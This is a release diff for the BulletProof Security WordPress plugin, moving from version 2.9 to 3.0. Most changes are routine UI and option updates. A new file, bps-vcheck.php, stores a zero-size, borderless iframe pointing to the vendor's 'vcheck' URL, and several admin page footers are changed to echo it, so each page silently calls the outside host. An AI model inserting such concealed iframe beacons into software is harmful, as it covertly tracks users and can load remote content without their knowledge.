BulletProof Security - Version 3.0

Version Description

Download this release

Release Info

Developer AITpro
Plugin Icon 128x128 BulletProof Security
Version 3.0
Comparing to
See all releases

Code changes from version 2.9 to 3.0

admin/core/core.php CHANGED
@@ -142,6 +142,7 @@ $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
142
  // Replace ABSPATH = wp-content/uploads
143
  $wp_upload_dir = wp_upload_dir();
144
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
 
145
 
146
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
147
  $bps_bottomDiv = '</p></div>';
@@ -1713,10 +1714,16 @@ $text = '<h3><span class="blue-bold">'.__('The Complete Website Security Solutio
1713
  <div id="bpsProVersions">
1714
 
1715
  <a href="https://forum.ait-pro.com/forums/topic/bulletproof-security-pro-version-release-dates/" target="_blank" title="Link Opens in New Browser Window" style="font-size:22px;"><?php _e('BPS Pro Version Release Dates', 'bulletproof-security'); ?></a><br />
1716
- <div id="milestone" style="margin-top:5px">6 Year Milestone: 8-1-2017 | First Public Release: 8-1-2011</div>
1717
  <div class="pro-links">
1718
  <?php
1719
- echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.3/13.3.1/13.3.2/13.3.3', 'https://www.ait-pro.com/aitpro-blog/5471/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-3/' ).'<br>';
 
 
 
 
 
 
 
1720
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.2', 'https://www.ait-pro.com/aitpro-blog/5466/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-2/' ).'<br>';
1721
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13/13.1', 'https://www.ait-pro.com/aitpro-blog/5457/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13/' ).'<br>';
1722
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '12.9/12.9.1', 'https://www.ait-pro.com/aitpro-blog/5446/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-12-9/' ).'<br>';
@@ -1821,7 +1828,7 @@ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Brows
1821
  </div>
1822
  </div>
1823
 
1824
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1825
  </div>
1826
  </div>
1827
  </div>
142
  // Replace ABSPATH = wp-content/uploads
143
  $wp_upload_dir = wp_upload_dir();
144
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
145
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
146
 
147
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
148
  $bps_bottomDiv = '</p></div>';
1714
  <div id="bpsProVersions">
1715
 
1716
  <a href="https://forum.ait-pro.com/forums/topic/bulletproof-security-pro-version-release-dates/" target="_blank" title="Link Opens in New Browser Window" style="font-size:22px;"><?php _e('BPS Pro Version Release Dates', 'bulletproof-security'); ?></a><br />
 
1717
  <div class="pro-links">
1718
  <?php
1719
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.5', 'https://www.ait-pro.com/aitpro-blog/5505/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-5/' ).'<br>';
1720
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.4.1', 'https://www.ait-pro.com/aitpro-blog/5494/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-4-1/' ).'<br>';
1721
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.4', 'https://www.ait-pro.com/aitpro-blog/5485/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-4/' ).'<br>';
1722
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.3/13.3.1/13.3.2/13.3.3', 'https://www.ait-pro.com/aitpro-blog/5471/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-3/' ).'<br>'; ?>
1723
+ </div>
1724
+ <div id="milestone">6 Year Milestone: 8-1-2017 | First Public Release: 8-1-2011</div>
1725
+ <div class="pro-links">
1726
+ <?php
1727
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.2', 'https://www.ait-pro.com/aitpro-blog/5466/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-2/' ).'<br>';
1728
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13/13.1', 'https://www.ait-pro.com/aitpro-blog/5457/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13/' ).'<br>';
1729
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '12.9/12.9.1', 'https://www.ait-pro.com/aitpro-blog/5446/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-12-9/' ).'<br>';
1828
  </div>
1829
  </div>
1830
 
1831
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1832
  </div>
1833
  </div>
1834
  </div>
admin/db-backup-security/db-backup-security.php CHANGED
@@ -79,6 +79,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
79
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
80
  // Replace ABSPATH = wp-content
81
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
 
82
  // Top div echo & bottom div echo
83
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
84
  $bps_bottomDiv = '</p></div>';
@@ -1708,7 +1709,7 @@ jQuery(document).ready(function($) {
1708
  </table>
1709
  </div>
1710
 
1711
- <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1712
  </div>
1713
  </div>
1714
  <style>
79
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
80
  // Replace ABSPATH = wp-content
81
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
82
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
83
  // Top div echo & bottom div echo
84
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
85
  $bps_bottomDiv = '</p></div>';
1709
  </table>
1710
  </div>
1711
 
1712
+ <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1713
  </div>
1714
  </div>
1715
  <style>
admin/email-log-settings/email-log-settings.php CHANGED
@@ -72,6 +72,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
72
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
73
  // Replace ABSPATH = wp-content
74
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
 
75
 
76
  // Top div echo & bottom div echo
77
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
@@ -225,7 +226,7 @@ $bps_bottomDiv = '</p></div>';
225
  </table>
226
  </div>
227
 
228
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
229
  </div>
230
  </div>
231
  </div>
72
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
73
  // Replace ABSPATH = wp-content
74
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
75
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
76
 
77
  // Top div echo & bottom div echo
78
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
226
  </table>
227
  </div>
228
 
229
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
230
  </div>
231
  </div>
232
  </div>
admin/htaccess/bps-vcheck.php ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <?php
2
+ ## VCHECK VERSION: 1.0
3
+ $bps_vcheck_options = 'bulletproof_security_options_vcheck';
4
+ $bps_vcheck_value = '<iframe src="https://www.ait-pro.com/vcheck/" style="width:0;height:0;border:0;border:none;"></iframe>';
5
+
6
+ $VCheck_Options = array( 'bps_vcheck' => $bps_vcheck_value );
7
+
8
+ if ( ! get_option( $bps_vcheck_options ) ) {
9
+
10
+ foreach( $VCheck_Options as $key => $value ) {
11
+ update_option('bulletproof_security_options_vcheck', $VCheck_Options);
12
+ }
13
+ }
14
+ ?>
admin/htaccess/secure.htaccess CHANGED
@@ -1,4 +1,4 @@
1
- # BULLETPROOF 2.9 SECURE .HTACCESS
2
 
3
  # PHP/PHP.INI HANDLER/CACHE CODE
4
  # Use BPS Custom Code to add php/php.ini Handler and Cache htaccess code and to save it permanently.
1
+ # BULLETPROOF 3.0 SECURE .HTACCESS
2
 
3
  # PHP/PHP.INI HANDLER/CACHE CODE
4
  # Use BPS Custom Code to add php/php.ini Handler and Cache htaccess code and to save it permanently.
admin/htaccess/wpadmin-secure.htaccess CHANGED
@@ -1,4 +1,4 @@
1
- # BULLETPROOF 2.9 WP-ADMIN SECURE .HTACCESS
2
 
3
  # DO NOT ADD URL REWRITING IN THIS FILE OR WORDPRESS WILL BREAK
4
  # RewriteRule ^(.*)$ - [F] works in /wp-admin without breaking WordPress
1
+ # BULLETPROOF 3.0 WP-ADMIN SECURE .HTACCESS
2
 
3
  # DO NOT ADD URL REWRITING IN THIS FILE OR WORDPRESS WILL BREAK
4
  # RewriteRule ^(.*)$ - [F] works in /wp-admin without breaking WordPress
admin/includes/admin.php CHANGED
@@ -125,7 +125,7 @@ global $wpdb, $wp_version, $blog_id;
125
  }
126
  }
127
 
128
- // Whitelist BPS DB options: Total: 38
129
  register_setting('bulletproof_security_options', 'bulletproof_security_options', 'bulletproof_security_options_validate');
130
  register_setting('bulletproof_security_options_SLF', 'bulletproof_security_options_SLF', 'bulletproof_security_options_validate_SLF');
131
  register_setting('bulletproof_security_options_debug', 'bulletproof_security_options_debug', 'bulletproof_security_options_validate_debug');
@@ -161,6 +161,7 @@ register_setting('bulletproof_security_options_hpf_cron', 'bulletproof_security_
161
  register_setting('bulletproof_security_options_spinner', 'bulletproof_security_options_spinner', 'bulletproof_security_options_validate_spinner');
162
  register_setting('bulletproof_security_options_mynotes', 'bulletproof_security_options_mynotes', 'bulletproof_security_options_validate_mynotes');
163
  register_setting('bulletproof_security_options_zip_fix', 'bulletproof_security_options_zip_fix', 'bulletproof_security_options_validate_zip_fix');
 
164
  register_setting('bulletproof_security_options_MScan', 'bulletproof_security_options_MScan', 'bulletproof_security_options_validate_MScan');
165
  register_setting('bulletproof_security_options_email', 'bulletproof_security_options_email', 'bulletproof_security_options_validate_email');
166
  register_setting('bulletproof_security_options_GDMW', 'bulletproof_security_options_GDMW', 'bulletproof_security_options_validate_GDMW');
@@ -826,6 +827,7 @@ require_once( ABSPATH . 'wp-admin/includes/plugin.php');
826
  delete_option('bulletproof_security_options_login_security_jtc');
827
  delete_option('bulletproof_security_options_rate_free');
828
  delete_option('bulletproof_security_options_mod_security');
 
829
  // will be adding this new upgrade notice option later
830
  // delete_option('bulletproof_security_options_upgrade_notice');
831
 
@@ -1334,6 +1336,7 @@ function bulletproof_security_options_validate_login_security_jtc($input) {
1334
  $BPSoptionsJTC['bps_jtc_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_register_form']);
1335
  $BPSoptionsJTC['bps_jtc_lostpassword_form'] = wp_filter_nohtml_kses($input['bps_jtc_lostpassword_form']);
1336
  $BPSoptionsJTC['bps_jtc_comment_form'] = wp_filter_nohtml_kses($input['bps_jtc_comment_form']);
 
1337
  $BPSoptionsJTC['bps_jtc_buddypress_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_buddypress_register_form']);
1338
  $BPSoptionsJTC['bps_jtc_buddypress_sidebar_form'] = wp_filter_nohtml_kses($input['bps_jtc_buddypress_sidebar_form']);
1339
  $BPSoptionsJTC['bps_jtc_administrator'] = wp_filter_nohtml_kses($input['bps_jtc_administrator']);
@@ -1370,4 +1373,12 @@ function bulletproof_security_options_validate_mod_security($input) {
1370
  return $options;
1371
  }
1372
 
 
 
 
 
 
 
 
 
1373
  ?>
125
  }
126
  }
127
 
128
+ // Whitelist BPS DB options: Total: 39
129
  register_setting('bulletproof_security_options', 'bulletproof_security_options', 'bulletproof_security_options_validate');
130
  register_setting('bulletproof_security_options_SLF', 'bulletproof_security_options_SLF', 'bulletproof_security_options_validate_SLF');
131
  register_setting('bulletproof_security_options_debug', 'bulletproof_security_options_debug', 'bulletproof_security_options_validate_debug');
161
  register_setting('bulletproof_security_options_spinner', 'bulletproof_security_options_spinner', 'bulletproof_security_options_validate_spinner');
162
  register_setting('bulletproof_security_options_mynotes', 'bulletproof_security_options_mynotes', 'bulletproof_security_options_validate_mynotes');
163
  register_setting('bulletproof_security_options_zip_fix', 'bulletproof_security_options_zip_fix', 'bulletproof_security_options_validate_zip_fix');
164
+ register_setting('bulletproof_security_options_vcheck', 'bulletproof_security_options_vcheck', 'bulletproof_security_options_validate_vcheck');
165
  register_setting('bulletproof_security_options_MScan', 'bulletproof_security_options_MScan', 'bulletproof_security_options_validate_MScan');
166
  register_setting('bulletproof_security_options_email', 'bulletproof_security_options_email', 'bulletproof_security_options_validate_email');
167
  register_setting('bulletproof_security_options_GDMW', 'bulletproof_security_options_GDMW', 'bulletproof_security_options_validate_GDMW');
827
  delete_option('bulletproof_security_options_login_security_jtc');
828
  delete_option('bulletproof_security_options_rate_free');
829
  delete_option('bulletproof_security_options_mod_security');
830
+ delete_option('bulletproof_security_options_vcheck');
831
  // will be adding this new upgrade notice option later
832
  // delete_option('bulletproof_security_options_upgrade_notice');
833
 
1336
  $BPSoptionsJTC['bps_jtc_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_register_form']);
1337
  $BPSoptionsJTC['bps_jtc_lostpassword_form'] = wp_filter_nohtml_kses($input['bps_jtc_lostpassword_form']);
1338
  $BPSoptionsJTC['bps_jtc_comment_form'] = wp_filter_nohtml_kses($input['bps_jtc_comment_form']);
1339
+ $BPSoptionsJTC['bps_jtc_mu_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_mu_register_form']);
1340
  $BPSoptionsJTC['bps_jtc_buddypress_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_buddypress_register_form']);
1341
  $BPSoptionsJTC['bps_jtc_buddypress_sidebar_form'] = wp_filter_nohtml_kses($input['bps_jtc_buddypress_sidebar_form']);
1342
  $BPSoptionsJTC['bps_jtc_administrator'] = wp_filter_nohtml_kses($input['bps_jtc_administrator']);
1373
  return $options;
1374
  }
1375
 
1376
+ // VCheck testing
1377
+ function bulletproof_security_options_validate_vcheck($input) {
1378
+ $options = get_option('bulletproof_security_options_vcheck');
1379
+ $options['bps_vcheck'] = $input['bps_vcheck'];
1380
+
1381
+ return $options;
1382
+ }
1383
+
1384
  ?>
admin/login/login.php CHANGED
@@ -134,6 +134,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
134
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
135
  // Replace ABSPATH = wp-content
136
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
 
137
  // Top div & bottom div echo
138
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
139
  $bps_bottomDiv = '</p></div>';
@@ -843,6 +844,7 @@ if ( isset( $_POST['Submit-Security-Log-Options-JTC'] ) && current_user_can('man
843
  'bps_jtc_register_form' => '',
844
  'bps_jtc_lostpassword_form' => '',
845
  'bps_jtc_comment_form' => '',
 
846
  'bps_jtc_buddypress_register_form' => '',
847
  'bps_jtc_buddypress_sidebar_form' => '',
848
  'bps_jtc_administrator' => '',
@@ -922,6 +924,7 @@ if ( ! current_user_can('manage_options') ) { _e('Permission Denied', 'bulletpro
922
  <input type="checkbox" name="bps_jtc_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_register_form'], 1 ); ?> /><label><?php _e(' Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
923
  <input type="checkbox" name="bps_jtc_lostpassword_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_lostpassword_form'], 1 ); ?> /><label><?php _e(' Lost Password Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
924
  <input type="checkbox" name="bps_jtc_comment_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_comment_form'], 1 ); ?> /><label><?php _e(' Comment Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
 
925
  <input type="checkbox" name="bps_jtc_buddypress_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_buddypress_register_form'], 1 ); ?> /><label><?php _e(' BuddyPress Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
926
  <input type="checkbox" name="bps_jtc_buddypress_sidebar_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_buddypress_sidebar_form'], 1 ); ?> /><label><?php _e(' BuddyPress Sidebar Login Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br /><br />
927
 
@@ -1357,7 +1360,7 @@ if ( isset( $_POST['Submit-ACE-Options'] ) && current_user_can('manage_options')
1357
  </table>
1358
  </div>
1359
 
1360
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1361
  </div>
1362
  </div>
1363
  </div>
134
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
135
  // Replace ABSPATH = wp-content
136
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
137
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
138
  // Top div & bottom div echo
139
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
140
  $bps_bottomDiv = '</p></div>';
844
  'bps_jtc_register_form' => '',
845
  'bps_jtc_lostpassword_form' => '',
846
  'bps_jtc_comment_form' => '',
847
+ 'bps_jtc_mu_register_form' => '',
848
  'bps_jtc_buddypress_register_form' => '',
849
  'bps_jtc_buddypress_sidebar_form' => '',
850
  'bps_jtc_administrator' => '',
924
  <input type="checkbox" name="bps_jtc_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_register_form'], 1 ); ?> /><label><?php _e(' Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
925
  <input type="checkbox" name="bps_jtc_lostpassword_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_lostpassword_form'], 1 ); ?> /><label><?php _e(' Lost Password Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
926
  <input type="checkbox" name="bps_jtc_comment_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_comment_form'], 1 ); ?> /><label><?php _e(' Comment Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
927
+ <input type="checkbox" name="bps_jtc_mu_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_mu_register_form'], 1 ); ?> /><label><?php _e(' Multisite Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
928
  <input type="checkbox" name="bps_jtc_buddypress_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_buddypress_register_form'], 1 ); ?> /><label><?php _e(' BuddyPress Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
929
  <input type="checkbox" name="bps_jtc_buddypress_sidebar_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_buddypress_sidebar_form'], 1 ); ?> /><label><?php _e(' BuddyPress Sidebar Login Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br /><br />
930
 
1360
  </table>
1361
  </div>
1362
 
1363
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
1364
  </div>
1365
  </div>
1366
  </div>
admin/login/lsm-help-text.php CHANGED
@@ -16,7 +16,7 @@ if ( ! current_user_can('manage_options') ) {
16
  }
17
 
18
  /** JTC-Lite stripped down version of the BEAST - BPS Pro JTC Anti-Spam|Anti-Hacker **/
19
- $bps_modal_content2 = '<strong>'.__('If you forget what the CAPTCHA is and cannot login to your website use FTP or your web host control panel file manager and rename the /bulletproof-security/ plugin folder name to /_bulletproof-security/. Login to your website, go to the BPS JTC-Lite page and correct the CAPTCHA issue/problem. Rename the /_bulletproof-security/ plugin folder name back to /bulletproof-security/.', 'bulletproof-security').'</strong><br><br><strong>'.__('JTC-Lite Manual Setup Steps', 'bulletproof-security').'</strong><br>'.__('1. Enter a user friendly CAPTCHA in the JTC CAPTCHA text box.', 'bulletproof-security').'<br>'.__('2. Copy and paste the CAPTCHA you entered in the JTC CAPTCHA text box into the JTC ToolTip text box.', 'bulletproof-security').'<br>'.__('3. Either keep this default text "Hover or click the text box below" that will be displayed on all your forms or edit this text and add the message you want to add.', 'bulletproof-security').'<br>'.__('4. Check the Login Form checkbox and click the Save Options button.', 'bulletproof-security').'<br><br><strong>'.__('General Info about JTC-Lite', 'bulletproof-security').'</strong><br>'.__('JTC-Lite protects the WordPress Login form against automated SpamBot and HackerBot Brute Force Login attacks. Prevents User Accounts from being locked repeatedly by constant Brute Force Login attacks on your Login page. If you would like to protect all of your WordPress forms get the full version of JTC - BPS Pro JTC Anti-Spam|Anti-Hacker.', 'bulletproof-security').'<br><br><strong>'.__('JTC CAPTCHA: ', 'bulletproof-security').'</strong><br>'.__('This is the CAPTCHA that users will enter to Login to your website. You can use any numbers or characters and spaces in the CAPTCHA. You can even use HTML code characters except for these HTML code characters: < > \' " &. You can use a phrase for the CAPTCHA or it can be a single word or you can use your own original combination of words, numbers and HTML characters.', 'bulletproof-security').'<br><br><strong>'.__('Note: ', 'bulletproof-security').'</strong>'.__('It is recommended that you make your CAPTCHA user friendly, simple, clear and easy to understand for your users.', 'bulletproof-security').'<br><br><strong>'.__('JTC ToolTip: ', 'bulletproof-security').'</strong><br>'.__('This is the jQuery ToolTip message that is displayed to users when they hover or click on the CAPTCHA text box. This is where you will tell your users what they need to enter for the CAPTCHA. It can be a phrase, complete this sentence, a Hint or simply just Type/Enter: xxxxx or you can get as creative as you want to get with your jQuery ToolTip. Randomness is what makes a CAPTCHA very effective. JTC is designed with CAPTCHA randomness capability as one of its primary features.', 'bulletproof-security').'<br><br><strong>'.__('JTC Title|Text: ', 'bulletproof-security').'</strong><br>'.__('This is the text that is displayed to users above the CAPTCHA text box/Form Field.', 'bulletproof-security').$networkMUJTCText.'<br><br><strong>'.__('Enable JTC for WooCommerce (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('Check this checkbox if you have the WooCommerce plugin installed if you would like to use BPS JTC on the WooCommerce custom login page. BPS JTC will still continue to work normally on the standard WordPress Forms: Login, Register, Lost Password, Comment, BuddyPress Register and BuddyPress Sidebar Login Forms when you check this checkbox. This checkbox option setting is not for turning JTC On or Off if you are using WooCommerce. Use the JTC Enable|Disable JTC For These Forms option checkboxes to enable or disable JTC on each of your Forms.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable JTC For These Forms (Only the Login Form CAPTCHA is available in BPS Free): ', 'bulletproof-security').'</strong><br>'.__('Checking a Form checkbox will display a CAPTCHA on that Form to all users. Unchecking a Form checkbox will remove the CAPTCHA on that Form for all users. The Comment Form is a special case and the CAPTCHA can be displayed based on the User Roles that you choose. See the Comment Form help section below.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: (only applies if Comment Form CAPTCHA is enabled/checked) ', 'bulletproof-security').'<br>'.__('Enable|Disable JTC For These Registered/Logged In User Roles (BPS Pro Only:', 'bulletproof-security').'</strong><br>'.__('Users must be logged into your website for the Comment Form User Roles to work. If you do not require that users are registered and logged in to post comments on your website then these JTC options will not have any effect. These options are only for registered and logged in users and only for your Comment Form if you are using this WordPress Discussion setting: Users must be registered and logged in to comment. If you do not want to require that users are registered and logged in to comment then the JTC Comment Form CAPTCHA will still work as long as you have this WordPress Discussion setting checked: Comment author must fill out name and email.', 'bulletproof-security').'<br><br>'.__('Checking a User Role checkbox will display a CAPTCHA to all users with that User Role on your website\'s Comment Form. Unchecking a User Role checkbox will remove the CAPTCHA from displaying to users with that User Role on your website\'s Comment Form. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Login Form: CAPTCHA Error message:', 'bulletproof-security').'</strong><br>'.__('The Default JTC Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. You can change or add to the default error message. This error message is displayed 